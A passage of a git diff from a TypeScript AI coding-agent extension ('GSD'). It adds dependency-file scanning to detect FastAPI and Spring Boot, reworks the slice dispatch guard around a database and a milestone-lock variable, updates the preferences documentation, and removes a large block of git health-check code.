existsSync(join(gsdHome, "PREFERENCES.md")) + existsSync(join(gsdHome, "PREFERENCES.md")) || + existsSync(join(gsdHome, "preferences.md")) ) { return false; } @@ -468,3 +785,370 @@ function readMakefileTargets(basePath: string): string[] { return []; } } + +function pushUnique(arr: string[], value: string): void { + if (!arr.includes(value)) arr.push(value); +} + +function matchesProjectFileMarker(scannedFile: string, marker: string): boolean { + const normalized = scannedFile.replaceAll("\\", "/"); + return ( + normalized === marker || + normalized.endsWith(`/${marker}`) + ); +} + +function isPythonRequirementsFile(relativePath: string): boolean { + const normalized = relativePath.replaceAll("\\", "/"); + const basename = normalized.slice(normalized.lastIndexOf("/") + 1); + return ( + basename === "requirements.txt" || + basename === "requirements.in" || + /^requirements([-.].+)?\.(txt|in)$/i.test(basename) || + /(^|\/)requirements\/.+\.(txt|in)$/i.test(normalized) + ); +} + +function containsFastapiDependency(basePath: string, relativePaths: string[]): boolean { + for (const relativePath of relativePaths) { + try { + const raw = readBounded(join(basePath, relativePath), 64 * 1024); + const content = extractDependencyContent(relativePath, raw); + if (isPythonRequirementsFile(relativePath)) { + for (const line of content.split("\n")) { + if (extractRequirementName(line) === "fastapi") return true; + } + continue; + } + + if (relativePath.endsWith("pyproject.toml")) { + if (containsFastapiInPyproject(content)) return true; + } + } catch { + // unreadable file — continue scanning other candidate files + } + } + + return false; +} + +function containsSpringBootMarker( + basePath: string, + buildFiles: string[], + versionCatalogFiles: string[], + settingsFiles: string[], +): boolean { + const usedPluginAliases = new Set(); + const usedLibraryAliases = new Set(); + const catalogAccessors = resolveVersionCatalogAccessors(basePath, versionCatalogFiles, settingsFiles); + + for (const relativePath of buildFiles) { + try { + const raw = readBounded(join(basePath, relativePath), 64 * 1024); + const content = stripDependencyComments(relativePath, raw); + if (containsDirectSpringBootReference(relativePath, content)) { + return true; + } + + const normalized = content.toLowerCase(); + let match: RegExpExecArray | null; + for (const accessor of catalogAccessors) { + const aliasRe = new RegExp(`alias\\(\\s*${accessor}\\.plugins\\.([a-z0-9_.-]+)\\s*\\)`, "gi"); + while ((match = aliasRe.exec(normalized)) !== null) { + usedPluginAliases.add(normalizePluginAlias(match[1])); + } + + const libraryAliasRe = new RegExp(`\\b${accessor}\\.((?!plugins\\b)[a-z0-9_.-]+)`, "gi"); + while ((match = libraryAliasRe.exec(normalized)) !== null) { + usedLibraryAliases.add(normalizePluginAlias(match[1])); + } + } + } catch { + // unreadable build file — continue scanning others + } + } + + if (usedPluginAliases.size === 0 && usedLibraryAliases.size === 0) { + return false; + } + if (versionCatalogFiles.length === 0) { + return false; + } + + const springBootAliases = new Set(); + const springBootLibraries = new Set(); + const pendingSpringBootBundles: Array<{ bundleAlias: string; referencedAliases: string[] }> = []; + for (const relativePath of versionCatalogFiles) { + try { + const raw = readBounded(join(basePath, relativePath), 64 * 1024); + const content = stripDependencyComments(relativePath, raw); + const aliasRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\{[^\n}]*\bid\s*=\s*["']org\.springframework\.boot["'][^\n}]*\}/gm; + let match: RegExpExecArray | null; + while ((match = aliasRe.exec(content)) !== null) { + springBootAliases.add(normalizePluginAlias(match[1])); + } + + const libraryRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\{[^\n}]*\b(module\s*=\s*["']org\.springframework\.boot:[^"']+["']|group\s*=\s*["']org\.springframework\.boot["'][^\n}]*\bname\s*=\s*["']spring-boot[^"']*["'])[^\n}]*\}/gm; + while ((match = libraryRe.exec(content)) !== null) { + springBootLibraries.add(normalizePluginAlias(match[1])); + } + + const bundleRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\[([\s\S]*?)\]/gm; + while ((match = bundleRe.exec(content)) !== null) { + pendingSpringBootBundles.push({ + bundleAlias: normalizePluginAlias(`bundles.${match[1]}`), + referencedAliases: match[2] + .split(",") + .map((part) => normalizePluginAlias(part.replace(/["'\s]/g, ""))) + .filter(Boolean), + }); + } + } catch { + // unreadable version catalog — continue scanning others + } + } + + const springBootBundles = new Set(); + for (const pendingBundle of pendingSpringBootBundles) { + if (pendingBundle.referencedAliases.some((alias) => springBootLibraries.has(alias))) { + springBootBundles.add(pendingBundle.bundleAlias); + } + } + + for (const alias of usedPluginAliases) { + if (springBootAliases.has(alias)) return true; + } + for (const alias of usedLibraryAliases) { + if (springBootLibraries.has(alias) || springBootBundles.has(alias)) return true; + } + + return false; +} + +function stripDependencyComments(relativePath: string, content: string): string { + if (relativePath.endsWith("requirements.txt")) { + return content.replace(/(^|\s)#.*$/gm, ""); + } + if (relativePath.endsWith("pyproject.toml")) { + return content.replace(/(^|\s)#.*$/gm, ""); + } + if (relativePath.endsWith(".versions.toml")) { + return content.replace(/(^|\s)#.*$/gm, ""); + } + if (relativePath.endsWith("settings.gradle") || relativePath.endsWith("settings.gradle.kts")) { + return content + .replace(/\/\*[\s\S]*?\*\//g, "") + .replace(/\/\/.*$/gm, ""); + } + if (relativePath.endsWith("pom.xml")) { + return content.replace(//g, ""); + } + if (relativePath.endsWith("build.gradle") || relativePath.endsWith("build.gradle.kts")) { + return content + .replace(/\/\*[\s\S]*?\*\//g, "") + .replace(/\/\/.*$/gm, ""); + } + return content; +} + +function extractDependencyContent(relativePath: string, content: string): string { + const stripped = stripDependencyComments(relativePath, content); + if (relativePath.endsWith("pyproject.toml")) { + return extractPyprojectDependencySections(stripped); + } + return stripped; +} + +function extractRequirementName(spec: string): string | null { + const trimmed = spec.trim().replace(/^["']|["']$/g, ""); + if (!trimmed) return null; + + const match = trimmed.match(/^([A-Za-z0-9_.-]+)(?:\[[^\]]+\])?(?=\s*(?:@|[<>=!~;]|$))/); + if (!match) return null; + return normalizePackageName(match[1]); +} + +function containsFastapiInPyproject(content: string): boolean { + for (const line of content.split("\n")) { + const keyMatch = line.match(/^\s*([A-Za-z0-9_.-]+)\s*=/); + if (keyMatch) { + const key = normalizePackageName(keyMatch[1]); + if (key === "fastapi") { + return true; + } + if (key !== "dependencies") { + continue; + } + } + + const quotedSpecRe = /["']([^"']+)["']/g; + let match: RegExpExecArray | null; + while ((match = quotedSpecRe.exec(line)) !== null) { + if (extractRequirementName(match[1]) === "fastapi") { + return true; + } + } + } + + return false; +} + +function containsDirectSpringBootReference(relativePath: string, content: string): boolean { + if (relativePath.endsWith("pom.xml")) { + return /\s*org\.springframework\.boot\s*<\/groupId>/i.test(content); + } + + if (relativePath.endsWith("build.gradle") || relativePath.endsWith("build.gradle.kts")) { + return /(id\s*\(?\s*["']org\.springframework\.boot["']|apply\s*\(?\s*plugin\s*[:=]\s*["']org\.springframework\.boot["']|(?:implementation|api|compileOnly|runtimeOnly|testImplementation|annotationProcessor|kapt)\s*\(?\s*["'][^"']*org\.springframework\.boot:[^"']*spring-boot[^"']*["'])/i.test(content); + } + + return false; +} + +function extractPyprojectDependencySections(content: string): string { + const lines = content.split("\n"); + const collected: string[] = []; + let section = ""; + let collectingProjectDeps = false; + let collectingOptionalDeps = false; + let bracketDepth = 0; + + for (const line of lines) { + const trimmed = line.trim(); + + if (collectingProjectDeps) { + collected.push(line); + bracketDepth += countChar(line, "[") - countChar(line, "]"); + if (bracketDepth <= 0) { + collectingProjectDeps = false; + } + continue; + } + + if (collectingOptionalDeps) { + collected.push(line); + bracketDepth += countChar(line, "[") - countChar(line, "]"); + if (bracketDepth <= 0) { + collectingOptionalDeps = false; + } + continue; + } + + const sectionMatch = trimmed.match(/^\[([^\]]+)\]$/); + if (sectionMatch) { + section = sectionMatch[1].trim(); + continue; + } + + if (section === "project" && /^dependencies\s*=\s*\[/.test(trimmed)) { + collected.push(line); + bracketDepth = countChar(line, "[") - countChar(line, "]"); + collectingProjectDeps = bracketDepth > 0; + continue; + } + + if ( + section === "project.optional-dependencies" || + section === "tool.poetry.dependencies" + ) { + if (section === "project.optional-dependencies") { + const equalsIndex = line.indexOf("="); + if (equalsIndex !== -1) { + const value = line.slice(equalsIndex + 1); + collected.push(value); + bracketDepth = countChar(value, "[") - countChar(value, "]"); + collectingOptionalDeps = bracketDepth > 0; + } + } else { + collected.push(line); + } + } + } + + return collected.join("\n"); +} + +function countChar(text: string, char: string): number { + return [...text].filter((c) => c === char).length; +} + +function normalizePackageName(name: string): string { + return name.toLowerCase().replace(/[_.]/g, "-"); +} + +function normalizePluginAlias(alias: string): string { + return alias.toLowerCase().replace(/[-_]/g, "."); +} + +function versionCatalogAccessorName(relativePath: string): string { + const normalized = relativePath.replaceAll("\\", "/"); + const basename = normalized.slice(normalized.lastIndexOf("/") + 1); + return basename.replace(/\.versions\.toml$/i, "").toLowerCase(); +} + +function resolveVersionCatalogAccessors( + basePath: string, + versionCatalogFiles: string[], + settingsFiles: string[], +): Set { + const accessors = new Set(versionCatalogFiles.map(versionCatalogAccessorName).filter(Boolean)); + if (versionCatalogFiles.length === 0 || settingsFiles.length === 0) { + return accessors; + } + + for (const settingsFile of settingsFiles) { + try { + const raw = readBounded(join(basePath, settingsFile), 64 * 1024); + const content = stripDependencyComments(settingsFile, raw); + const createRe = /create\(\s*["']([A-Za-z0-9_]+)["']\s*\)\s*\{[\s\S]*?([A-Za-z0-9_.-]+\.versions\.toml)["']?\s*\)\s*\)/g; + let match: RegExpExecArray | null; + while ((match = createRe.exec(content)) !== null) { + const accessor = match[1].toLowerCase(); + const catalogBasename = match[2].replaceAll("\\", "/").split("/").pop()!; + if (versionCatalogFiles.some((file) => { + const normalized = file.replaceAll("\\", "/"); + return normalized === catalogBasename || normalized.endsWith(`/${catalogBasename}`); + })) { + accessors.add(accessor); + } + } + } catch { + // unreadable settings file — ignore + } + } + + return accessors; +} + +export function scanProjectFiles(basePath: string): string[] { + const files: string[] = []; + const queue: Array<{ path: string; depth: number }> = [{ path: basePath, depth: 0 }]; + + while (queue.length > 0 && files.length < MAX_RECURSIVE_SCAN_FILES) { + const current = queue.shift()!; + let entries: Array<{ name: string; isDirectory(): boolean; isFile(): boolean }>; + try { + entries = readdirSync(current.path, { withFileTypes: true, encoding: "utf8" }); + } catch { + continue; + } + + for (const entry of entries) { + const entryPath = join(current.path, entry.name); + const relativePath = entryPath.slice(basePath.length + 1); + + if (entry.isDirectory()) { + if (current.depth < MAX_RECURSIVE_SCAN_DEPTH && !RECURSIVE_SCAN_IGNORED_DIRS.has(entry.name)) { + queue.push({ path: entryPath, depth: current.depth + 1 }); + } + continue; + } + + if (!entry.isFile()) continue; + files.push(relativePath); + if (files.length >= MAX_RECURSIVE_SCAN_FILES) break; + } + } + + return files; +} diff --git a/src/resources/extensions/gsd/dispatch-guard.ts b/src/resources/extensions/gsd/dispatch-guard.ts index e0f065fea..c687f1b30 100644 --- a/src/resources/extensions/gsd/dispatch-guard.ts +++ b/src/resources/extensions/gsd/dispatch-guard.ts @@ -1,10 +1,12 @@ // GSD Dispatch Guard — prevents out-of-order slice dispatch -import { readFileSync } from "node:fs"; -import { readdirSync } from "node:fs"; -import { resolveMilestoneFile, milestonesDir } from "./paths.js"; -import { parseRoadmapSlices } from "./roadmap-slices.js"; +import { resolveMilestoneFile } from "./paths.js"; import { findMilestoneIds } from "./guided-flow.js"; +import { parseUnitId } from "./unit-id.js"; +import { isDbAvailable, getMilestoneSlices } from "./gsd-db.js"; +import { parseRoadmap } from "./parsers-legacy.js"; +import { isClosedStatus } from "./status-guards.js"; +import { readFileSync } from "node:fs"; const SLICE_DISPATCH_TYPES = new Set([ "research-slice", @@ -14,28 +16,6 @@ const SLICE_DISPATCH_TYPES = new Set([ "complete-slice", ]); -/** - * Read a roadmap file from disk (working tree) rather than from a git branch. - * - * Prior implementation used `git show :` which read committed - * state on a specific branch. This caused false-positive blockers when work - * was committed on a milestone/worktree branch but the integration branch - * (main) hadn't been updated yet — the guard would see prior slices as - * incomplete on main even though they were done in the working tree (#530). - * - * Reading from disk always reflects the latest state, regardless of which - * branch is checked out or whether changes have been committed. - */ -function readRoadmapFromDisk(base: string, milestoneId: string): string | null { - try { - const absPath = resolveMilestoneFile(base, milestoneId, "ROADMAP"); - if (!absPath) return null; - return readFileSync(absPath, "utf-8").trim(); - } catch { - return null; - } -} - export function getPriorSliceCompletionBlocker( base: string, _mainBranch: string, @@ -44,12 +24,23 @@ export function getPriorSliceCompletionBlocker( ): string | null { if (!SLICE_DISPATCH_TYPES.has(unitType)) return null; - const [targetMid, targetSid] = unitId.split("/"); + const { milestone: targetMid, slice: targetSid } = parseUnitId(unitId); if (!targetMid || !targetSid) return null; + // Parallel worker isolation: when GSD_MILESTONE_LOCK is set, this worker + // is scoped to a single milestone. Skip the cross-milestone dependency + // check — other milestones are being handled by their own workers. + // Without this, the dispatch guard sees incomplete slices in M010/M011 + // (cloned into the worktree DB) and blocks M012 from ever starting. #2797 + const milestoneLock = process.env.GSD_MILESTONE_LOCK; + // Use findMilestoneIds to respect custom queue order. // Only check milestones that come BEFORE the target in queue order. - const allIds = findMilestoneIds(base); + // When locked to a specific milestone, only check that milestone's + // intra-slice dependencies — skip all cross-milestone checks. + const allIds = milestoneLock && targetMid === milestoneLock + ? [targetMid] + : findMilestoneIds(base); const targetIdx = allIds.indexOf(targetMid); if (targetIdx < 0) return null; const milestoneIds = allIds.slice(0, targetIdx + 1); @@ -58,11 +49,35 @@ export function getPriorSliceCompletionBlocker( if (resolveMilestoneFile(base, mid, "PARKED")) continue; if (resolveMilestoneFile(base, mid, "SUMMARY")) continue; - // Read from disk (working tree) — always has the latest state - const roadmapContent = readRoadmapFromDisk(base, mid); - if (!roadmapContent) continue; + // Normalised slice list from DB or file fallback + type NormSlice = { id: string; done: boolean; depends: string[] }; + let slices: NormSlice[] | null = null; + + if (isDbAvailable()) { + const rows = getMilestoneSlices(mid); + if (rows.length > 0) { + slices = rows.map((r) => ({ + id: r.id, + done: isClosedStatus(r.status), + depends: r.depends ?? [], + })); + } + } + if (!slices) { + // File-based fallback: parse roadmap checkboxes + const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP"); + if (!roadmapPath) continue; + let roadmapContent: string; + try { roadmapContent = readFileSync(roadmapPath, "utf-8"); } catch { continue; } + const parsed = parseRoadmap(roadmapContent); + if (parsed.slices.length === 0) continue; + slices = parsed.slices.map((s) => ({ + id: s.id, + done: s.done, + depends: s.depends ?? [], + })); + } - const slices = parseRoadmapSlices(roadmapContent); if (mid !== targetMid) { const incomplete = slices.find((slice) => !slice.done); if (incomplete) { diff --git a/src/resources/extensions/gsd/docs/preferences-reference.md b/src/resources/extensions/gsd/docs/preferences-reference.md index f3b2ccd0f..cc8c4b3b0 100644 --- a/src/resources/extensions/gsd/docs/preferences-reference.md +++ b/src/resources/extensions/gsd/docs/preferences-reference.md @@ -1,6 +1,6 @@ # GSD Preferences Reference -Full documentation for `~/.gsd/preferences.md` (global) and `.gsd/preferences.md` (project). +Full documentation for `~/.gsd/PREFERENCES.md` (global) and `.gsd/PREFERENCES.md` (project). --- @@ -51,8 +51,8 @@ skill_rules: [] Preferences are loaded from two locations and merged: -1. **Global:** `~/.gsd/preferences.md` — applies to all projects -2. **Project:** `.gsd/preferences.md` — applies to the current project only +1. **Global:** `~/.gsd/PREFERENCES.md` — applies to all projects +2. **Project:** `.gsd/PREFERENCES.md` — applies to the current project only **Merge behavior** (see `mergePreferences()` in `preferences.ts`): @@ -102,12 +102,14 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea - `custom_instructions`: extra durable instructions related to skill use. For operational project knowledge (recurring rules, gotchas, patterns), use `.gsd/KNOWLEDGE.md` instead — it's injected into every agent prompt automatically and agents can append to it during execution. -- `models`: per-stage model selection for auto-mode. Keys: `research`, `planning`, `execution`, `execution_simple`, `completion`, `subagent`. Values can be: +- `models`: per-stage model selection (applies to both auto-mode and guided-flow dispatches). Keys: `research`, `planning`, `discuss`, `execution`, `execution_simple`, `completion`, `validation`, `subagent`. Values can be: - Simple string: `"claude-sonnet-4-6"` — single model, no fallbacks - Provider-qualified string: `"bedrock/claude-sonnet-4-6"` — targets a specific provider when the same model ID exists across multiple providers - Object with fallbacks: `{ model: "claude-opus-4-6", fallbacks: ["glm-5", "minimax-m2.5"] }` — tries fallbacks in order if primary fails - Object with provider: `{ model: "claude-opus-4-6", provider: "bedrock" }` — explicit provider targeting in object format - - Omit a key to use whatever model is currently active. Fallbacks are tried when model switching fails (provider unavailable, rate limited, etc.). + - Omit a key to use whatever model is currently active (except `discuss` and `validation` which fall back to `planning` when unset). Fallbacks are tried when model switching fails (provider unavailable, rate limited, etc.). + - `discuss` — used for milestone/slice discussion (interactive context gathering). Falls back to `planning` if unset. + - `validation` — used for gate evaluation, roadmap reassessment, milestone validation, and doc rewrites. Falls back to `planning` if unset. - `skill_staleness_days`: number — skills unused for this many days get deprioritized during discovery. Set to `0` to disable staleness tracking. Default: `60`. @@ -126,8 +128,8 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea - `auto_push`: boolean — automatically push commits to the remote after committing. Default: `false`. - `push_branches`: boolean — push the milestone branch to the remote after commits. Default: `false`. - `remote`: string — git remote name to push to. Default: `"origin"`. - - `snapshots`: boolean — create snapshot commits (WIP saves) during long-running tasks. Default: `false`. - - `pre_merge_check`: boolean or `"auto"` — run pre-merge checks before merging a worktree back to the integration branch. `true` always runs, `false` never runs, `"auto"` runs when CI is detected. Default: `false`. + - `snapshots`: boolean — create snapshot commits (WIP saves) during long-running tasks. Default: `true`. + - `pre_merge_check`: boolean or `"auto"` — run pre-merge checks before merging a worktree back to the integration branch. `true` always runs, `false` never runs, `"auto"` runs when CI is detected. Default: `"auto"`. - `commit_type`: string — override the conventional commit type prefix. Must be one of: `feat`, `fix`, `refactor`, `docs`, `test`, `chore`, `perf`, `ci`, `build`, `style`. Default: inferred from diff content. - `main_branch`: string — the primary branch name for new git repos (e.g., `"main"`, `"master"`, `"trunk"`). Also used by `getMainBranch()` as the preferred branch when auto-detection is ambiguous. Default: `"main"`. - `merge_strategy`: `"squash"` or `"merge"` — controls how worktree branches are merged back. `"squash"` combines all commits into one; `"merge"` preserves individual commits. Default: `"squash"`. @@ -187,6 +189,13 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea - `budget_pressure`: boolean — downgrade model tier when budget is under pressure. Default: `true`. - `cross_provider`: boolean — allow routing across different providers. Default: `true`. - `hooks`: boolean — enable routing hooks. Default: `true`. + - `capability_routing`: boolean — enable capability-profile scoring for model selection within a tier. Requires `enabled: true`. Default: `false`. + +- `context_management`: configures context hygiene for auto-mode sessions. Keys: + - `observation_masking`: boolean — mask old tool results to reduce context bloat. Default: `true`. + - `observation_mask_turns`: number — keep this many recent turns verbatim (1-50). Default: `8`. + - `compaction_threshold_percent`: number — trigger compaction at this % of context window (0.5-0.95). Lower values fire compaction earlier, reducing drift. Default: `0.70`. + - `tool_result_max_chars`: number — max chars per tool result in GSD sessions (200-10000). Default: `800`. - `auto_visualize`: boolean — show a visualizer hint after each milestone completion in auto-mode. Default: `false`. @@ -202,6 +211,7 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea - `budget_ceiling`: number — optional per-parallel-run budget ceiling. - `merge_strategy`: `"per-slice"` or `"per-milestone"` — when to merge worktree results back. Default: `"per-milestone"`. - `auto_merge`: `"auto"`, `"confirm"`, or `"manual"` — merge behavior after completion. `"auto"` merges immediately; `"confirm"` asks first; `"manual"` leaves branches for you. Default: `"confirm"`. + - `worker_model`: string — optional model override for parallel milestone workers. When set, workers use this model (e.g. `"claude-haiku-4-5"`) instead of inheriting the coordinator's model. Useful for cost savings on execution-heavy milestones. - `verification_commands`: string[] — shell commands to run as verification after task execution (e.g., `["npm test", "npm run lint"]`). Commands run in order; if any fails, the task is marked as needing fixes. @@ -241,6 +251,9 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea **Known unit types for `before`/`after`:** `research-milestone`, `plan-milestone`, `research-slice`, `plan-slice`, `execute-task`, `complete-slice`, `replan-slice`, `reassess-roadmap`, `run-uat`. +- `experimental`: opt-in experimental features. All features here are **off by default** — you must explicitly set each one to `true` to enable it. Features in this block may change or be removed without a deprecation cycle while in experimental status. Keys: + - `rtk`: boolean — enable RTK (Real-Time Kompression) shell-command compression. When enabled, GSD wraps shell commands through the RTK binary to reduce token usage during command execution. RTK is downloaded automatically on first use if not already installed. **Default: `false`** (opt-in required). Set `GSD_RTK_DISABLED=1` in the environment to force-disable regardless of this preference. + --- ## Best Practices @@ -652,3 +665,15 @@ verification_max_retries: 2 ``` Runs test, lint, and typecheck after each task. On failure, auto-fix is attempted up to 2 times before reporting the issue. + +## Experimental Features Example + +```yaml +--- +version: 1 +experimental: + rtk: true +--- +``` + +Opts in to RTK shell-command compression. RTK is downloaded automatically on first use. Set `GSD_RTK_DISABLED=1` to force-disable at the environment level regardless of this setting. diff --git a/src/resources/extensions/gsd/doctor-checks.ts b/src/resources/extensions/gsd/doctor-checks.ts index 64eb0a921..d9a26e66c 100644 --- a/src/resources/extensions/gsd/doctor-checks.ts +++ b/src/resources/extensions/gsd/doctor-checks.ts @@ -1,1068 +1,5 @@ -import { existsSync, lstatSync, readdirSync, readFileSync, realpathSync, rmSync, statSync } from "node:fs"; -import { basename, dirname, join, sep } from "node:path"; - -import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js"; -import { readRepoMeta, externalProjectsRoot } from "./repo-identity.js"; -import { loadFile, parseRoadmap } from "./files.js"; -import { resolveMilestoneFile, milestonesDir, gsdRoot, resolveGsdRootFile, relGsdRootFile } from "./paths.js"; -import { deriveState, isMilestoneComplete } from "./state.js"; -import { saveFile } from "./files.js"; -import { listWorktrees, resolveGitDir, worktreesDir } from "./worktree-manager.js"; -import { abortAndReset } from "./git-self-heal.js"; -import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch, writeIntegrationBranch } from "./git-service.js"; -import { nativeIsRepo, nativeBranchExists, nativeWorktreeList, nativeWorktreeRemove, nativeBranchList, nativeBranchDelete, nativeLsFiles, nativeRmCached, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js"; -import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.js"; -import { ensureGitignore } from "./gitignore.js"; -import { getAllWorktreeHealth } from "./worktree-health.js"; -import { readAllSessionStatuses, isSessionStale, removeSessionStatus } from "./session-status-io.js"; -import { recoverFailedMigration } from "./migrate-external.js"; -import { loadEffectiveGSDPreferences } from "./preferences.js"; - -export async function checkGitHealth( - basePath: string, - issues: DoctorIssue[], - fixesApplied: string[], - shouldFix: (code: DoctorIssueCode) => boolean, - isolationMode: "none" | "worktree" | "branch" = "worktree", -): Promise { - // Degrade gracefully if not a git repo - if (!nativeIsRepo(basePath)) { - return; // Not a git repo — skip all git health checks - } - - const gitDir = resolveGitDir(basePath); - - // ── Orphaned auto-worktrees & Stale milestone branches ──────────────── - // These checks only apply in worktree/branch modes — skip in none mode - // where no milestone worktrees or branches are created. - if (isolationMode !== "none") { - try { - const worktrees = listWorktrees(basePath); - const milestoneWorktrees = worktrees.filter(wt => wt.branch.startsWith("milestone/")); - - // Load roadmap state once for cross-referencing - const state = await deriveState(basePath); - - for (const wt of milestoneWorktrees) { - // Extract milestone ID from branch name "milestone/M001" → "M001" - const milestoneId = wt.branch.replace(/^milestone\//, ""); - const milestoneEntry = state.registry.find(m => m.id === milestoneId); - - // Check if milestone is complete via roadmap - let isComplete = false; - if (milestoneEntry) { - const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); - const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null; - if (roadmapContent) { - const roadmap = parseRoadmap(roadmapContent); - isComplete = isMilestoneComplete(roadmap); - } - } - - if (isComplete) { - issues.push({ - severity: "warning", - code: "orphaned_auto_worktree", - scope: "milestone", - unitId: milestoneId, - message: `Worktree for completed milestone ${milestoneId} still exists at ${wt.path}`, - fixable: true, - }); - - if (shouldFix("orphaned_auto_worktree")) { - // Never remove a worktree matching current working directory - const cwd = process.cwd(); - if (wt.path === cwd || cwd.startsWith(wt.path + sep)) { - fixesApplied.push(`skipped removing worktree at ${wt.path} (is cwd)`); - } else { - try { - nativeWorktreeRemove(basePath, wt.path, true); - fixesApplied.push(`removed orphaned worktree ${wt.path}`); - } catch { - fixesApplied.push(`failed to remove worktree ${wt.path}`); - } - } - } - } - } - - // ── Stale milestone branches ───────────────────────────────────────── - try { - const branches = nativeBranchList(basePath, "milestone/*"); - if (branches.length > 0) { - const worktreeBranches = new Set(milestoneWorktrees.map(wt => wt.branch)); - - for (const branch of branches) { - // Skip branches that have a worktree (handled above) - if (worktreeBranches.has(branch)) continue; - - const milestoneId = branch.replace(/^milestone\//, ""); - const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); - const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null; - if (!roadmapContent) continue; - - const roadmap = parseRoadmap(roadmapContent); - if (isMilestoneComplete(roadmap)) { - issues.push({ - severity: "info", - code: "stale_milestone_branch", - scope: "milestone", - unitId: milestoneId, - message: `Branch ${branch} exists for completed milestone ${milestoneId}`, - fixable: true, - }); - - if (shouldFix("stale_milestone_branch")) { - try { - nativeBranchDelete(basePath, branch, true); - fixesApplied.push(`deleted stale branch ${branch}`); - } catch { - fixesApplied.push(`failed to delete branch ${branch}`); - } - } - } - } - } - } catch { - // git branch list failed — skip stale branch check - } - } catch { - // listWorktrees or deriveState failed — skip worktree/branch checks - } - } // end isolationMode !== "none" - - // ── Corrupt merge state ──────────────────────────────────────────────── - try { - const mergeStateFiles = ["MERGE_HEAD", "SQUASH_MSG"]; - const mergeStateDirs = ["rebase-apply", "rebase-merge"]; - const found: string[] = []; - - for (const f of mergeStateFiles) { - if (existsSync(join(gitDir, f))) found.push(f); - } - for (const d of mergeStateDirs) { - if (existsSync(join(gitDir, d))) found.push(d); - } - - if (found.length > 0) { - issues.push({ - severity: "error", - code: "corrupt_merge_state", - scope: "project", - unitId: "project", - message: `Corrupt merge/rebase state detected: ${found.join(", ")}`, - fixable: true, - }); - - if (shouldFix("corrupt_merge_state")) { - const result = abortAndReset(basePath); - fixesApplied.push(`cleaned merge state: ${result.cleaned.join(", ")}`); - } - } - } catch { - // Can't check .git dir — skip - } - - // ── Tracked runtime files ────────────────────────────────────────────── - try { - const trackedPaths: string[] = []; - for (const exclusion of RUNTIME_EXCLUSION_PATHS) { - try { - const files = nativeLsFiles(basePath, exclusion); - if (files.length > 0) { - trackedPaths.push(...files); - } - } catch { - // Individual ls-files can fail — continue - } - } - - if (trackedPaths.length > 0) { - issues.push({ - severity: "warning", - code: "tracked_runtime_files", - scope: "project", - unitId: "project", - message: `${trackedPaths.length} runtime file(s) are tracked by git: ${trackedPaths.slice(0, 5).join(", ")}${trackedPaths.length > 5 ? "..." : ""}`, - fixable: true, - }); - - if (shouldFix("tracked_runtime_files")) { - try { - for (const exclusion of RUNTIME_EXCLUSION_PATHS) { - nativeRmCached(basePath, [exclusion]); - } - fixesApplied.push(`untracked ${trackedPaths.length} runtime file(s)`); - } catch { - fixesApplied.push("failed to untrack runtime files"); - } - } - } - } catch { - // git ls-files failed — skip - } - - // ── Legacy slice branches ────────────────────────────────────────────── - try { - const branchList = nativeBranchList(basePath, "gsd/*/*") - .filter((branch) => !branch.startsWith("gsd/quick/")); - if (branchList.length > 0) { - issues.push({ - severity: "info", - code: "legacy_slice_branches", - scope: "project", - unitId: "project", - message: `${branchList.length} legacy slice branch(es) found: ${branchList.slice(0, 3).join(", ")}${branchList.length > 3 ? "..." : ""}. These are no longer used (branchless architecture).`, - fixable: true, - }); - - if (shouldFix("legacy_slice_branches")) { - let deleted = 0; - for (const branch of branchList) { - try { - nativeBranchDelete(basePath, branch, true); - deleted++; - } catch { /* skip branches that can't be deleted */ } - } - if (deleted > 0) { - fixesApplied.push(`deleted ${deleted} legacy slice branch(es)`); - } - } - } - } catch { - // git branch list failed — skip - } - - // ── Integration branch existence ────────────────────────────────────── - // For each active (non-complete) milestone, verify the stored integration - // branch still exists in git. A missing integration branch blocks merge-back - // and causes the next merge operation to fail silently. - try { - const state = await deriveState(basePath); - const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git ?? {}; - for (const milestone of state.registry) { - if (milestone.status === "complete") continue; - const resolution = resolveMilestoneIntegrationBranch(basePath, milestone.id, gitPrefs); - if (!resolution.recordedBranch) continue; // No stored branch — skip (not yet set) - if (resolution.status === "fallback" && resolution.effectiveBranch) { - issues.push({ - severity: "warning", - code: "integration_branch_missing", - scope: "milestone", - unitId: milestone.id, - message: resolution.reason, - fixable: true, - }); - if (shouldFix("integration_branch_missing")) { - writeIntegrationBranch(basePath, milestone.id, resolution.effectiveBranch); - fixesApplied.push(`updated integration branch for ${milestone.id} to "${resolution.effectiveBranch}"`); - } - continue; - } - - if (resolution.status === "missing") { - issues.push({ - severity: "error", - code: "integration_branch_missing", - scope: "milestone", - unitId: milestone.id, - message: resolution.reason, - fixable: false, - }); - } - } - } catch { - // Non-fatal — integration branch check failed - } - - // ── Orphaned worktree directories ──────────────────────────────────── - // Worktree removal can fail after a branch delete, leaving a directory - // that is no longer registered with git. These orphaned dirs cause - // "already exists" errors when re-creating the same worktree name. - try { - const wtDir = worktreesDir(basePath); - if (existsSync(wtDir)) { - // Resolve symlinks and normalize separators so that symlinked .gsd - // paths (e.g. ~/.gsd/projects//worktrees/…) match the paths - // returned by `git worktree list`. - const normalizePath = (p: string): string => { - try { p = realpathSync(p); } catch { /* path may not exist */ } - return p.replaceAll("\\", "/"); - }; - const registeredPaths = new Set( - nativeWorktreeList(basePath).map(entry => normalizePath(entry.path)), - ); - for (const entry of readdirSync(wtDir)) { - const fullPath = join(wtDir, entry); - try { - if (!statSync(fullPath).isDirectory()) continue; - } catch { continue; } - const normalizedFullPath = normalizePath(fullPath); - if (!registeredPaths.has(normalizedFullPath)) 